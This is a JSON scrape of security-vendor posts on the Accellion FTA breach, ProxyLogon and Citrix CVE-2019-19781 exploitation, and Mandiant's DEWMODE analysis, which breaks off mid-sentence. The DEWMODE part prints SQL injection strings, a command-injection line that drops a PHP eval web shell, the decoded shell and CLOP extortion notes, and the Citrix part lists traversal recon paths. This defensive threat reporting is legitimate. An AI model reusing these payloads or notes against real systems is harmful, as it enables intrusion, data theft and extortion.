future.\n\nIn December 2020, attackers exploited a single zero-day vulnerability in enterprise firewall company Accellion\u2019s File Transfer Appliance (FTA) technology to steal customer data, credit information, and personal data such as birthdates and email addresses subsequently to use as leverage in ongoing extortion attempts.\n\nA post-breach analysis of the attack revealed that the attacker(s) chained together the following vulnerabilities in their content firewall: SQL Injection (CVE-2021-27101) and OS Command Execution (CVE-2021-27104). The attacker leveraged the SQL Injection vulnerability against the file document_root.html to retrieve \u201cW\u201d keys from the Accellion FTA database. Accellion issued a patch to mitigate the vulnerabilities less than 72 hours after discovery.\n\nAfter the December 20, 2020 release of Accellion\u2019s patch, which remediated the vulnerabilities associated with the December exploit, the attacker changed their entry point and employed a new technique involving ServerSide Request Forgery (SSRF) (CVE-2021-27103) and OS Command Execution (CVE-2021-27102). The attacker\u2019s strategy was clear: a two-phase approach with the first targeting vulnerabilities in the content firewall and the second targeting the database where the customer data was held.\n\n### Attack techniques used in the Accellion breach are likely to continue\n\nToday\u2019s cyber attacks are becoming ever more creative, sophisticated and well-funded, in many cases by nation states. As a result, the attackers now have the resources to learn how the software of a target organization works. They have the resources to stay abreast of trends and vulnerabilities, increasing their capacity to make more sophisticated attacks. To get the highest return on their investment, attackers and their sponsors choose organizations whose applications and appliances are widely used and trusted by thousands of customers, like Accellion\u2019s FTA.\n\nAs in the 2020 [SolarWinds breach](<https://www.imperva.com/blog/2020-ends-with-a-bang/>), the attackers didn\u2019t just exploit vulnerabilities to compromise a target system, they were knowledgeable enough to run a clean-up routine to erase evidence of the activity. In the Accellion case, the attackers took the time to reverse-engineer their target\u2019s software and figure out the best way to breach their content firewall. When Accellion shut down that path, they already had a plan to attack the database itself. Attacking a company like Accellion that facilitates secure file transfers is particularly brazen. Irony notwithstanding, it makes sense. Accellion enterprise customers using secure file transfers are very likely to be moving around the exact data that an attacker wants to steal. In the end, the attackers were also able to weaponize the data and use it for global extortion attempts that are [likely to continue](<https://www.wired.com/story/accellion-breach-victims-extortion/>) for many months.\n\n### An optimal data security posture thwarts these new breeds of attacks\n\nThe Accellion breach started with a SQL injection attack. Just using SQL injection, the attackers managed to complete a successful attack. This illustrates very clearly the absolute need to do analytics and threat detection at the data layer. The lowest common denominator in all applications is the data repository layer - all apps and all systems store data somewhere. Most applications use a database although in today\u2019s modern architecture landscape many things can and should be classified as a database even if technically they are not a DBMS. At the end of the day, you can discover almost any attack just by looking at the data layer because every application has a data component.\n\nGoing back to the [Imperva Research Lab\u2019s data](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) and seeing the chronic and persistent frequency with which SQL injection results in attacks, it seems that organizations still are not paying enough attention to securing the data layer. In the SolarWinds case, as well as this Accellion breach, monitoring at the data level with machine learning model-driven [behavior analytics](<https://www.imperva.com/learn/data-security/ueba-user-and-entity-behavior-analytics/>) and [automated detection](<https://www.imperva.com/products/data-risk-analytics/>) of non-compliant, risky, or malicious data access behavior would have brought up-front attention to these attacks.\n\nThe other thing we learn from the Accellion breach is that one must protect all paths to the data. When the content firewall protection fails, you must have internal protection in place to stop attacks. In the Accellion case, they only fixed a part of the problem after the first breach. They mitigated the first vulnerability - but most of the attack itself stayed the same when the attacker launched the second phase of the breach. The attackers changed only the entry point until they gained the ability to run an OS command. From there, the rest of the attack followed the pattern of the first, they only had to find a different first step. This highlights the critical importance for organizations to secure all access points as a matter of course. Imperva is dedicated not only to securing data, but securing all paths to the data. Imperva helps organizations take a holistic approach to security and execute both application monitoring and database monitoring.\n\nThe post [Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack](<https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T19:39:36", "type": "impervablog", "title": "Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-09T19:39:36", "id": "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "href": "https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-29T14:27:27", "description": "### Introduction\n\nOn 2 March 2021, [Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [Veloxity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) produced disclosures outlining the discovery of four zero day vulnerabilities affecting multiple versions of Microsoft Exchange Server. Each of the vulnerabilities have been attributed a severity rating from high to critical, however the most impactful statement from both Microsoft and Veloxity was that these vulnerabilities formed an attack chain which was being actively exploited in the wild.\n\nSince the publication of these disclosures, details have emerged regarding the observed source of the exploitation of these vulnerabilities. The attacks are being widely attributed to the state-sponsored group dubbed Hafnium, [alleged](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to be operating out of China.\n\nThe most notable of the new CVEs, [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), is a SSRF vulnerability in Microsoft Exchange which allows an attacker to induce the server into performing \u201cunintended actions\u201d through the use of a series of specially crafted POST requests. The attacker can leverage this vulnerability to exploit the other CVEs to perform malicious actions, such as dump private email, or even achieve remote code execution.\n\nImperva has put dedicated security rules in place to protect our customers in a direct response to the initial disclosures. Imperva has also performed analysis on the attempted exploitation of these CVEs and we have produced the following insights.\n\n### Observations and Statistics\n\nSince the 2 March disclosures, Imperva has observed over **44k** scanning and exploitation attempt sessions in the wild from over **1,600** unique source IPs, related to the Microsoft Exchange [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) SSRF. From this data, we have been able to identify the most targeted industries and countries which have been affected by the vulnerability in the aftermath of the disclosures.\n\n### Targeted Industries\n\nOne of the key observations we have made is that this vulnerability has impacted almost every category of industry, this observation is explained by how ubiquitous the use of Microsoft Exchange is across all sectors. According to our data, the Computing & IT sector was the most targeted industry, with 21% of all targeted sites belonging to this category. Next was Financial Services with 18%, and Telecoms and ISPs completed the top 3 with 10.5%. Below we show the breakdown of scanning and exploitation attempts against various industries.\n\n### Targeted Countries\n\nImperva observed both scanning and exploitation attempts against sites worldwide, with the US being the most targeted country, with the UK and Singapore a distant second and third, respectively.\n\n### Source Countries\n\nImperva observed that since the disclosures, relatively few scanning and exploitation attempts have been made from Chinese sources. This could be because exploitation, and to a greater extent, scanning has shifted to the wider public. It may also be because the attackers are using proxies to carry out the attacks. The chart below shows the top attacking countries by session count observed by Imperva analysts since the disclosures.\n\n### Attacker IP Reputation\n\nImperva\u2019s IP reputation allows for the identification of potentially suspicious or malicious behaviour by means of tagging relevant IPs. From this data, **42.3%** of the attacker source IPs were previously tagged by Imperva as having exhibited malicious behaviour and **8.45%** of the attacker source IPs were previously tagged by Imperva as being identified as vulnerability scanners.\n\n### Observed Attacker Activity\n\nImperva analysts have observed various indicators of the attempted exploitation of the Microsoft Exchange Hafnium [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) in the wild, indicating various motives on the part of the attackers. As mentioned previously, an attacker can leverage the vulnerability to perform various unauthorized actions, including the collection of private information, and even the writing of arbitrary files to the server resulting in remote code execution. In this section, we will discuss some of the requests we have observed and the perceived intentions and motivation of the attackers.\n\nDetailed descriptions of how the exploit chain works, and how it can be exploited are available at various different sources [[1](<https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265>)][[2](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>)], however the important thing to understand is that the vulnerability allows an attacker to send malicious requests to various backend components in Microsoft Exchange by means of a specially crafted POST request to either the Outlook Web Application or the Exchange Admin Centre, where the \u201cX-BEResource\u201d and \u201cX-AnonResource-Backend" cookie values can be manipulated to specify the targeted resource. In our investigation following the disclosures we have observed the following in our data.\n\n### Crafted requests to /EWS/Exchange.asmx\n\nA common exploit request observed by Imperva attempting to exploit the CVE-2021-26855 SSRF vulnerability was a POST request to Exchange Admin Centre (/ecp/) and Outlook Web Application endpoints (/owa/) endpoint, with the crafted cookie value endpoints set to the Exchange Web Services endpoint \u201c/EWS/Exchange.asmx\u201d. This allows the attacker to gain authenticated access to private mail on the server. This request accounted for **18%** of exploitation attempts observed.\n\n### Crafted requests to /autodiscover/autodiscover.xml\n\nThe most common exploitation attempt of the SSRF observed by Imperva analysts were requests to the Exchange Admin Centre endpoint (/ecp), with the vulnerabile cookie set with the FQDN of the server, and the endpoint of /autodiscover/autodiscover.xml.\n\nAutodiscover in Exchange is a service which allows for the rapid collection of Exchange configurations, service URLs and supported protocols, therefore it makes an obvious target for attackers who are attempting to quickly gather information, escalate privileges and maintain persistence. In the case of this vulnerability the autodiscover service could be used to gather the information required for further exploitation of the other CVEs associated with the chain. This request accounted for **51%** of exploitation attempts observed.\n\n### Crafted requests to /mapi/emsmdb\n\nAnother pattern Imperva analysts observed were crafted POST requests to the Exchange Admin Centre (/ecp), with the cookie value crafted with the **/mapi/emsmdb** endpoint.\n\nResearch into the published exploits and disclosures indicate that the \u201c/mapi/emsmdb\u201d endpoint can be abused to procure a valid SID, which can then allow the attacker to gain privileges to the Exchange \u201c**proxyLogin.ecp**\u201d endpoint (Exchange HTTP proxy), which can in turn be used to obtain a valid \u201c**ASP.NET_SessionID**\u201d and \u201c**msExchEcpCanary**\u201d values which are required for further chained exploitation of MS exchange. This request accounted for **3%** of exploitation attempts observed.\n\n### How Imperva protects you\n\nImperva has implemented rules in [Cloud WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) and [On Prem WAF](<https://www.imperva.com/products/web-application-firewall-waf/>), which are effective against all exploitation of CVE-2021-26855. These rules are also effective against the chained exploitation of the subsequent CVEs: [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>).\n\n### Check if you have been compromised\n\nSince the disclosures of these zero day vulnerabilities, various news articles have been published reporting mass exploitation [[1](<https://www.bbc.com/news/technology-56372188>)][[2](<https://www.zdnet.com/article/microsoft-exchange-server-zero-day-attacks-malicious-software-found-on-2300-machines-in-uk/>)]. We recommend that if you have unpatched exchange servers in your organization, you apply the latest patches from Microsoft as soon as possible, and use the following [guide](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) from Microsoft to check for any indicators of compromise.\n\nThe post [Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures](<https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T15:06:38", "type": "impervablog", "title": "Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-26T15:06:38", "id": "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "href": "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T15:26:21", "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writeable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of various clients that were identified based on client verification tests, as sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - this was identified by cURL User-Agent as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the amount of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked: \n\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-19T15:00:50", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T12:35:18", "description": "Starting in mid-December 2020, malicious actors that Mandiant tracks as UNC2546 exploited multiple zero-day vulnerabilities in Accellion\u2019s legacy File Transfer Appliance (FTA) to install a newly discovered web shell named DEWMODE. The motivation of UNC2546 was not immediately apparent, but starting in late January 2021, several organizations that had been impacted by UNC2546 in the prior month began receiving extortion emails from actors threatening to publish stolen data on the \u201cCL0P^_- LEAKS\" .onion website. Some of the published victim data appears to have been stolen using the DEWMODE web shell.\n\nNotably, the number of victims on the \u201cCL0P^_- LEAKS\" shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada, and the Netherlands recently outed by these threat actors. Mandiant has previously reported that FIN11 has threatened to post stolen victim data on this same .onion site as an additional tactic to pressure victims into paying extortion demands following the deployment of CLOP ransomware. However, in recent CLOP extortion incidents, no ransomware was deployed nor were the other hallmarks of FIN11 present.\n\nWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582. We have identified overlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity. For more information on our use of \u2018UNC\u2019 designations, see our blog post, \"DebUNCing Attribution: How Mandiant Tracks Uncategorized Threat Actors.\"\n\nMandiant has been working closely with Accellion in response to these matters and will be producing a complete security assessment report in the coming weeks. At this time, [Accellion has patched all FTA vulnerabilities](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>) known to be exploited by the threat actors and has added new monitoring and alerting capabilities to flag anomalies associated with these attack vectors. Mandiant has validated these patches. Mandiant is currently performing penetration testing and code review of the current version of the Accellion FTA product and has not found any other critical vulnerabilities in the FTA product based on our analysis to date. Accellion customers using the FTA legacy product were the targets of the attack.\n\nAccellion FTA is a 20-year-old product nearing end of life. Accellion strongly recommends that [FTA customers migrate to kiteworks](<https://www.accellion.com/products/fta/>), Accellion\u2019s [enterprise content firewall](<https://www.accellion.com/>) platform. Per Accellion, Kiteworks is built on an entirely different code base.\n\nThe following CVEs have since been reserved for tracking the recently patched Accellion FTA vulnerabilities:\n\n * [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) \\- SQL injection via a crafted Host header\n * [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) \\- OS command execution via a local web service call\n * [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) \\- SSRF via a crafted POST request\n * [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) \\- OS command execution via a crafted POST request\n\n#### UNC2546 and DEWMODE\n\nIn mid-December 2020, Mandiant responded to multiple incidents in which a web shell we call DEWMODE was used to exfiltrate data from Accellion FTA devices. The Accellion FTA device is a purpose-built application designed to allow an enterprise to securely transfer large files. The exfiltration activity has affected entities in a wide range of sectors and countries.\n\nAcross these incidents, Mandiant observed common infrastructure usage and TTPs, including exploitation of FTA devices to deploy the DEWMODE web shell. Mandiant determined that a common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546's activities.\n\n#### Evidence of Exploitation and DEWMODE Installation\n\nMandiant has been able reconstruct many of the details about how Accellion FTAs have been compromised through examination of Apache and system logs from impacted devices\u2014from initial compromise, to deployment of DEWMODE, and follow-on interaction.\n\nThe earliest identification of activity associated with this campaign occurred in mid-December 2020. At this time, Mandiant identified UNC2546 leveraging an SQL injection vulnerability in the Accellion FTA. This SQL injection served as the primary intrusion vector.\n\nMandiant observed evidence of SQL injection followed by subsequent requests to additional resources, as shown in Figure 1.\n\n[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#9700968/initial] (1) pass through /courier/document_root.html\n\n['))union(select(loc_id)from(net1.servers)where(proximity)=(0))#/sid#935ee00][rid#9706978/initial] (1) pass through /courier/document_root.html\n\n[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#971c098/initial] (1) pass through /courier/document_root.html\n\n[<redacted>/sid#935ee00][rid#971a090/initial] (1) pass through /courier/sftp_account_edit.php\n\n[<redacted>/sid#935ee00][rid#9706978/initial] (1) pass through /courier/oauth.api\n\n[<redacted>/sid#935ee00][rid#9708980/initial] (1) pass through /courier/oauth.api \n \n--- \n \nFigure 1: SQL injection log\n\nUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php. Immediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api.\n\nPWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --edit_user=F \n\\--mount_cifs=- \nV,DF,$(echo${IFS}PD9waHAKCmlmKGlzc2V0KCRfUkVRVUVTVFsndG9rZW4nXSkpCnsKICAgIGV2YWwoYm \nFzZTY0X2RlY29kZSgkX1JFUVVFU1RbJ3Rva2VuJ10pKTsKfQplbHNlIGlmKGlzc2V0KCRfUkVRVUVTVFsnd \nXNlcm5hbWUnXSkpCnsKICAgIHN5c3RlbSgkX1JFUVVFU1RbJ3VzZXJuYW1lJ10pOwp9CmVsc2UKewogICAgaG \nVhZGVyKCdMb2NhdGlvbjogLycpOwp9|base64${IFS}-d|tee${IFS}/home/seos/courier/oauth.api);FUK;\",PASSWORD # \\\" --passwd=pop \n--- \n \nFigure 2: Excerpt from log showing creation of eval web shell\n\nThe decoded contents are shown in Figure 3.\n\n<?php\n\nif(isset($_REQUEST['token'])) \n{ \neval(base64_decode($_REQUEST['token'])); \n} \nelse if(isset($_REQUEST['username'])) \n{ \nsystem($_REQUEST['username']); \n} \nelse \n{ \nheader('Location: /'); \n} \n \n--- \n \nFigure 3: Decoded eval web shell\n\nAlmost immediately following this sequence, the DEWMODE web shell is written to the system. The timing of these requests suggests that DEWMODE was delivered via the oauth.api web shell; however, the available evidence does not indicate the exact mechanism used to write DEWMODE to disk.\n\nMandiant has identified the DEWMODE web shell in one of the following two locations:\n\n * /home/seos/courier/about.html\n * /home/httpd/html/about.html\n\nThe DEWMODE web shell (Figure 4) extracts a list of available files from a MySQL database on the FTA and lists those files and corresponding metadata\u2014file ID, path, filename, uploader, and recipient\u2014on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell. Download requests are captured in the FTA\u2019s web logs, which will contain requests to the DEWMODE web shell with encrypted and encoded URL parameters, where dwn is the file path and fn is the requested file name (Figure 5). The encrypted file path and name values visible in web logs can be decrypted using key material obtained from the database used by the targeted FTA. Given the complex nature of this process, if your organization needs assistance reviewing relevant logs, please contact Mandiant or Accellion.\n\n\n\n \nFigure 4: DEWMODE web shell screenshot\n\nGET /courier/about.html?dwn=[REDACTED]&fn=[REDACTED] HTTP/1.1\" 200 1098240863 \"-\" \"-\" \"-\" TLSv1.2 ECDHE-RSA-AES128-SHA256 \n--- \n \nFigure 5: DEWMODE File Download URL parameters\n\nFollowing file downloads, UNC2546 initiates a cleanup routine by passing a specific query parameter named csrftoken with the value 11454bd782bb41db213d415e10a0fb3c to DEWMODE. The following actions are performed:\n\n * A shell script is written to /tmp/.scr, which will: \n * Remove all references to about.html from log files located in /var/opt/apache/\n * Write the modified log file to /tmp/x then replace the original log file at /var/opt/apache/\n * Delete the contents of the /home/seos/log/adminpl.log log file.\n * Remove /home/seos/courier/about.html (DEWMODE) and /home/seos/courier/oauth.api (eval web shell), and redirect command output to the file /tmp/.out\n * Change the permissions of the output file to be readable, writeable and executable by all users, and set the owner to \u201cnobody\u201d\n * Delete the script file /tmp/.scr and other temporarily created files to assist in cleanup\n * Display cleanup output to the requesting user\n\nAn example of a cleanup request and subsequent execution of the cleanup script can be seen in Figure 6.\n\nGET /courier/about.html?csrftoken=11454bd782bb41db213d415e10a0fb3c HTTP/1.1\" 200 5 \"-\" \"https://[REDACTED]//courier/about.html?aid=1000\" \"Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101\n\nsft sudo: nobody : TTY=unknown ; PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --mount_cifs=AF,DF,'$(sh /tmp/.scr)',PASSWORD \n \n--- \n \nFigure 6: DEWMODE cleanup request\n\nMandiant also identified a variant of DEWMODE (bdfd11b1b092b7c61ce5f02ffc5ad55a) which contained minor changes to the cleanup operation, including wiping of /var/log/secure and removing about.html and oauth.api from the directories /home/httpd/html/ instead of /home/seos/courier/.\n\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz (Figure 7). Based on temporal file access to the mysqldump utility and mysql data directories, the archive likely contained a dump of the database. With the exception of cache.js.gz, Mandiant has not observed UNC2546 acquiring files from Accellion appliances through any method besides DEWMODE.\n\nGET //courier/cache.js.gz HTTP/1.1\" 200 35654360 \"-\" \"-\" \"python-requests/2.24.0\" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \n--- \n \nFigure 7: cache.js.gz file request\n\n#### UNC2582 Data Theft Extortion\n\nShortly after installation of the web shell, in multiple cases within hours, UNC2546 leveraged DEWMODE to download files from compromised FTA instances. While the actors\u2019 motivations were not immediately clear, several weeks after delivery of the DEWMODE web shell, victims began to receive extortion emails from an actor claiming association with the CLOP ransomware team (Figure 8 and Figure 9). The actors threatened to publish data on the \"CL0P^_- LEAKS\" .onion shaming website, unless the victim paid an extortion fee. We are tracking the subsequent extortion activity under a separate threat cluster, UNC2582. Despite tracking the exploitation and extortion activity in separate threat clusters we have observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send UNC2582-attributed extortion email.\n\nHello!\n\nYour network has been hacked, a lot of valuable data stolen. <description of stolen data, including the total size of the compressed files> We are the CLOP ransomware team, you can google news and articles about us. We have a website where we publish news and stolen files from companies that have refused to cooperate. Here is his address http://[redacted].onion/ - use TOR browser or http://[redacted].onion.dog/ - mirror. We are visited by 20-30 thousand journalists, IT experts, hackers and competitors every day. We suggest that you contact us via chat within 24 hours to discuss the current situation. <victim-specific negotiation URL> \\- use TOR browser We don't want to hurt, our goal is money. We are also ready to provide any evidence of the presence of files with us. \n \n--- \n \nFigure 8: Extortion Note Template 1\n\nThis is the last warning!\n\nIf you don\u2019t get in touch today, tomorrow we will create a page with screenshots of your files (like the others on our site), send messages to all the emails that we received from your files. Due to the fact that journalists and hackers visit our site, calls and questions will immediately begin, online publications will begin to publish information about the leak, you will be asked to comment.\n\nDo not let this happen, write to us in chat or email and we will discuss the situation!\n\nCHAT: <victim-specific negotiation URL>\n\nEMAIL: unlock@support-box.com\n\nUSE TOR BROWSER! \n \n--- \n \nFigure 9: Extortion Note Template 2\n\nBased on observations at several engagements, UNC2582 appears to follow a pattern of escalation to pressure victims into paying extortion demands. Initial emails are sent from a free email account, likely unique per victim, to a seemingly limited distribution of addresses at the victim organization. If the victim does not respond in a timely manner, additional emails are sent to a much larger number of recipients from hundreds or thousands of different email accounts and using varied SMTP infrastructure. In at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat. Monitoring of the CL0P^_- LEAKS shaming website has demonstrated that UNC2582 has followed through on threats to publish stolen data as several new victims have 